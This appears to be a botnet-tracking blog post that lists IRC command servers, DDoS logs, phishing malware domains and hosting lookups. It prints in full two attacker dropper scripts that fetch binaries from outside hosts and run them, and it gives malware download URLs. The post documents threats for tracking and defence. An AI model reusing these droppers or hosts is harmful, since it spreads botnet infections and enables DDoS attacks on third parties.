185.61.138.235(STD Botnet hosted in Ukraine Kiev Blazingfast Llc)

Another SDT botnet found by abigail.

Server : 185.61.138.235
Port : 443
Channel : #secgod

DDOS Coming Up :

<~Broken> >bot +std 70.127.120.174 80 30
[STD]Hitting 70.127.120.174!
[STD]Done hitting 70.127.120.174!
<~Broken> >bot +stop
Killing pid 13923.

Other url : http://93.174.93.45/f.sh

#!/bin/sh
cd /tmp && wget http://93.174.93.45/mosh && chmod +x mosh && ./mosh
cd /tmp && wget http://93.174.93.45/mox64 && chmod +x mox64 && ./mox64
cd /tmp && wget http://93.174.93.45/momips && chmod +x momips && ./momips
cd /tmp && wget http://93.174.93.45/momipsel && chmod +x momipsel && ./momipsel
cd /tmp && wget http://93.174.93.45/moarm && chmod +x moarm && ./moarm
cd /tmp && wget http://93.174.93.45/moppc && chmod +x moppc && ./moppc
cd /tmp && wget http://93.174.93.45/moi686 && chmod +x moi686 && ./moi686


Hosting infos:
http://whois.domaintools.com/185.61.138.235

191.235.178.122(Modified Kaiten+STD hosted in Ireland Dublin Microsoft Informatica Ltda)

Found by abigail

Server : 191.235.178.122
Port 443

Channel : #sh

DDOS Coming Up lol :

<~Haze> >bot +std 172.56.41.67 80 120
[STD]Hitting 172.56.41.67!
[STD]Hitting 172.56.41.67!
[STD]Done hitting 172.56.41.67!
[STD]Done hitting 172.56.41.67!

The Bot u can download it here.

Other : http://5.152.206.162/getbinaries.sh

#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.

rm -fr /var/run/mipsel \
rm -fr /var/run/mips \
rm -fr /var/run/arm \
rm -fr /var/run/ppc \
rm -fr /var/run/powerpc \
rm -fr /var/run/sh4 \
rm -fr /var/run/sh \
rm -fr /var/run/murda \
rm -fr /var/run/x86_64 \
rm -fr /var/run/superh \

wget -c http://5.152.206.162/mipsel -P /var/run && chmod +x /var/run/mipsel && /var/run/mipsel
wget -c http://5.152.206.162/mips -P /var/run && chmod +x /var/run/mips && /var/run/mips
wget -c http://5.152.206.162/arm -P /var/run && chmod +x /var/run/arm && /var/run/arm
wget -c http://5.152.206.162/ppc -P /var/run && chmod +x /var/run/ppc && /var/run/ppc
wget -c http://5.152.206.162/sh4 -P /var/run && chmod +x /var/run/sh4 && /var/run/sh4
wget -c http://5.152.206.162/x86_64 -P /var/run && chmod +x /var/run/x86_64 && /var/run/x86_64
wget -c http://5.152.206.162/linux -P /var/run && chmod +x /var/run/linux && /var/run/linux
sleep 3;
rm -fr /var/run/getbinaries.sh

rm -fr /var/run/mipsel
rm -fr /var/run/mips
rm -fr /var/run/arm
rm -fr /var/run/ppc
rm -fr /var/run/powerpc
rm -fr /var/run/sh4
rm -fr /var/run/sh
rm -fr /var/run/murda
rm -fr /var/run/x86_64
rm -fr /var/run/superh
rm -fr /var/run/getbinaries.sh



Hosting infos :
http://whois.domaintools.com/191.235.178.122

jdsiwiqweiqwyreqwi.com(Phishing malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)

Domains used by the malware:

34324325kgkgfkgf.com
dsffdsk323721372131.com
fdshjfsh324332432.com
jdsiwiqweiqwyreqwi.com 80.242.123.208


HTTP Requests:

URI:
http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php

DATA:
POST /dffgbDFGvf465/YYf.php HTTP/1.0
Host: jdsiwiqweiqwyreqwi.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 272
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

samples:
80.242.123.211:888/darky.exe
80.242.123.211:888/1.exe
80.242.123.211:888/run.exe

Hosting infos:
http://whois.domaintools.com/80.242.123.208

89.248.172.240(30k botnet hosted in Netherlands Amsterdam Ecatel Ltd)

Botnet found by sPy.

Only server and port no channels here because no exe file to see for more.
Feel free to check for channels ur self.

Connecting to 89.248.172.240 (6667)

Invisible Users 12: 12 3554
Operators: 2 operator(s) online
Channels: 12 channels formed
Clients: I have 3555 clients and 0 servers
Local users: 3555 29989 Current local users 3555, max 29989
Global users: 3555 15450 Current global users 3555, max 15450

Hosting infos:
http://whois.domaintools.com/89.248.172.240

Linux Botnet Hosted In blackunix.us

This is the bot used to scan for vulnerabilities:
hxxp://pastebin.com/dEMULiQV

Now talking in #botnets
Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ]
Topic By : [ uyap ]
Modes On : [ #botnets ] [ +smntrMuk fcuked ]

The Bot is hosted here hxxp://visionafricamagazine.com/scripts/x.log